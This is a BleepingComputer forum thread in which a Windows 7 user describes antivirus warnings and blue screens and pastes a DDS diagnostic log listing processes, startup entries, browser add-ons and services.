Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

I am at a loss as to how to save my computer - I have some sort of Malware


  • This topic is locked This topic is locked
57 replies to this topic

#1 baabel

baabel

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 28 December 2014 - 08:21 AM

This is a problem that began the evening of December 27, 2014.

 

It began while I was on line with Internet Explorer. As it happens, I was on the Yahoo website.

Two things are happening.

 

First, I am getting multiple repetitive warnings that Avast Free has blocked malware. The details are different malwares each time, but each appears to end in "iexplore.exe" in the description.

I attach some examples.

 

Second, the screen goes blank several times, I get warnings about the display driver, and then I get a blue screen and which says something about a "memory dump" and then the machine reboots.

 

The blue screens usually happen when I am web browsing but not always.

 

Also, web sites are slow to open.

 

Avast Free is up to date; Malwarebytes and Spybot find nothing wrong. I do get CCleaner alerts that I have over 2 GB of data to clean.

 

When I switched to Firefox I still get multiple virus warnings; the bluescreens occur as well.

I also got several blue screens when I was not on any browser.

 

I also attach screen shots of the recent Avast history; I cannot seem to copy the data as a document.

 

I am at a loss as to how to save my computer.

 

Dell XPS 8500. Windows 7.

 

I was able to attach 6 of the 7 images i have prepared.

 

 



BC AdBot (Login to Remove)

 


#2 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 28 December 2014 - 09:03 AM

Here are the logfiles that you asked for.

 

Thank you !

 

 

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17496
Run by anonymous at 8:56:44 on 2014-12-28
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12249.8234 [GMT -5:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Security\Avast\AvastSvc.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe
C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
C:\Windows\SysWOW64\svchost.exe -k hpdevmgmt
c:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Program Files (x86)\Dell DataSafe Local Backup\sftservice.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe
C:\Security\Avast\ng\ngservice.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\TOASTER.EXE
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE
C:\Windows\syswow64\dllhost.exe
C:\Security\Eraser\Eraser.exe
C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe
C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\WinZip\WZQKPICK.EXE
c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Common Files\AOL\1341429429\ee\aolsoftware.exe
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ArcCon.ac
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Security\Avast\avastui.exe
C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\ctfmon.exe
C:\Windows\syswow64\napstat.exe
C:\Windows\syswow64\dplaysvr.exe
C:\Windows\syswow64\systray.exe
C:\Windows\syswow64\rundll32.exe
C:\Windows\syswow64\cmmon32.exe
C:\Windows\syswow64\regsvr32.exe
C:\Windows\syswow64\fixmapi.exe
C:\Windows\syswow64\wextract.exe
C:\Windows\syswow64\napstat.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\ctfmon.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\cmmon32.exe
C:\Windows\syswow64\rundll32.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\cmmon32.exe
C:\Windows\syswow64\upnpcont.exe
C:\Windows\syswow64\dpnsvr.exe
C:\Windows\syswow64\dplaysvr.exe
C:\Windows\syswow64\rundll32.exe
C:\Windows\syswow64\dllhst3g.exe
C:\Windows\syswow64\dvdupgrd.exe
C:\Windows\syswow64\logagent.exe
C:\Windows\syswow64\dvdupgrd.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
\\?\C:\Windows\system32\wbem\WMIADAP.EXE
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.google.com/?gws_rd=ssl
uSearch Bar = Preserve
mWinlogon: Userinit = userinit.exe,
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll
BHO: Spybot-S&D IE Protection: {53707962-6F74-2D53-2644-206D7942484F} -
BHO: CIESpeechBHO Class: {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Security\Avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Bing Bar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -
BHO: SingleInstance Class: {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
TB: Bing Bar: {8dcb7100-df86-4384-8842-8fa844297b3f} -
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [GBMPro9Agent] C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe
uRun: [GarminExpressTrayApp] "C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe"
uRun: [WinCalendar V4] "C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe /q /c"
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRunOnce: [Adobe Speed Launcher] 1419774945
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [ShwiconXP9106] C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
mRun: [StartCCC] "c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [Dell DataSafe Online] C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [ArcSoft Connection Service] C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
mRun: [HostManager] C:\Program Files (x86)\Common Files\AOL\1341429429\ee\AOLSoftware.exe
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [TrueImageMonitor.exe] C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
mRun: [CitrixReceiver] "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
mRun: [ConnectionCenter] "C:\Program Files (x86)\Citrix\ICA Client\concentr.exe" /startup
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [AvastUI.exe] "C:\Security\Avast\AvastUI.exe" /nogui
mRun: [Redirector] "C:\Program Files (x86)\Citrix\ICA Client\redirector.exe" /startup
mRun: [Nikon Message Center 2] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
mRun: [WinCalendar V4] "C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe" /q /c
mRun: [iTunesHelper] "C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
dRun: [WinCalendar V4] "C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe" /q /c
dRun: [GarminExpressTrayApp] "C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\HPDIGI~1.LNK - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\WINZIP~1.LNK - C:\Program Files (x86)\WinZip\WZQKPICK.EXE
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {7815BE26-237D-41A8-A98F-F7BD75F71086} - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} -
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: Garmin Communicator Plug-In - hxxps://static.garmincdn.com/gcp/ie/4.0.3.0/GarminAxControl_32.CAB
TCP: NameServer = 167.206.245.135 167.206.245.136
TCP: Interfaces\{53CD3CEC-463D-4EAF-8926-15D2D03A96A4} : DHCPNameServer = 167.206.245.135 167.206.245.136
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= C:\PROGRA~2\Citrix\ICACLI~1\RSHook.dll
SSODL: WebCheck - <orphaned>
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Security\Avast\aswWebRepIE64.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-TB: avast! Online Security: {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - LocalServer32 - <no file>
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4
x64-Run: [AtherosBtStack] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe"
x64-Run: [AthBtTray] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe"
x64-Run: [CanonSolutionMenu] C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe /logon
x64-Run: [Eraser] "C:\Security\Eraser\Eraser.exe" --atRestart
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [GBMPro8Agentx64] "C:\Program Files\Genie-Soft\GBMPro8x64\GBMAgent.exe"
x64-Run: [Acronis Scheduler2 Service] "C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe"
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
.
INFO: x64-HKLM has more than 50 listed domains.
   If you wish to scan all of them, select the 'Force scan all domains' option.
.
x64-Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - <orphaned>
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: GoToAssist - C:\Program Files (x86)\Citrix\GoToAssist\822\G2AWinLogon_x64.dll
x64-SSODL: WebCheck - <orphaned>
Hosts: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\anonymous\AppData\Roaming\Mozilla\Firefox\Profiles\1j94e34f.default-1417893552894\
FF - plugin: C:\Audiovisual & Graphics\iTunes\Mozilla Plugins\npitunes.dll
FF - plugin: C:\Audiovisual & Graphics\VLC\npvlc.dll
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll
FF - plugin: C:\Program Files (x86)\Citrix\ICA Client\npURLInterceptorPlugin.dll
FF - plugin: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll
FF - plugin: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_246.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2013-3-15 65776]
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2013-3-15 267632]
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2012-6-28 16152]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2012-7-21 55856]
R0 tdrpman273;Acronis Try&Decide and Restore Points filter (build 273);C:\Windows\System32\drivers\tdrpm273.sys [2012-8-23 1263200]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswsnx.sys [2012-6-30 1050432]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswsp.sys [2012-6-30 436624]
R1 ctxusbm;Citrix USB Monitor Driver;C:\Windows\System32\drivers\ctxusbm.sys [2013-9-24 97768]
R2 AdobeActiveFileMonitor10.0;Adobe Active File Monitor V10;C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [2011-9-14 169624]
R2 AERTFilters;Andrea RT Filters Service;C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [2012-6-28 98208]
R2 afcdpsrv;Acronis Nonstop Backup Service;C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe [2012-8-23 3246040]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2012-6-28 235520]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2014-4-26 29208]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2012-6-30 83280]
R2 aswStm;aswStm;C:\Windows\System32\drivers\aswstm.sys [2013-12-28 116728]
R2 AtherosSvc;AtherosSvc;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe [2011-12-29 106144]
R2 avast! Antivirus;avast! Antivirus;C:\Security\Avast\AvastSvc.exe [2014-11-28 50344]
R2 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE [2011-5-12 249648]
R2 Garmin Core Update Service;Garmin Core Update Service;C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [2014-8-7 438616]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2012-6-28 13592]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-1-10 627936]
R2 Intel® ME Service;Intel® ME Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [2012-6-28 128280]
R2 NAUpdate;Nero Update;C:\Program Files (x86)\Nero\Update\NASvc.exe [2012-7-13 769432]
R2 NOBU;Dell DataSafe Online;C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe [2010-8-25 2823000]
R2 SftService;SoftThinks Agent Service;C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe [2012-6-28 1695040]
R2 UNS;Intel® Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2012-6-28 363800]
R2 VBoxAswDrv;VBoxAsw Support Driver;C:\Security\Avast\ng\vbox\VBoxAswDrv.sys [2014-11-28 271752]
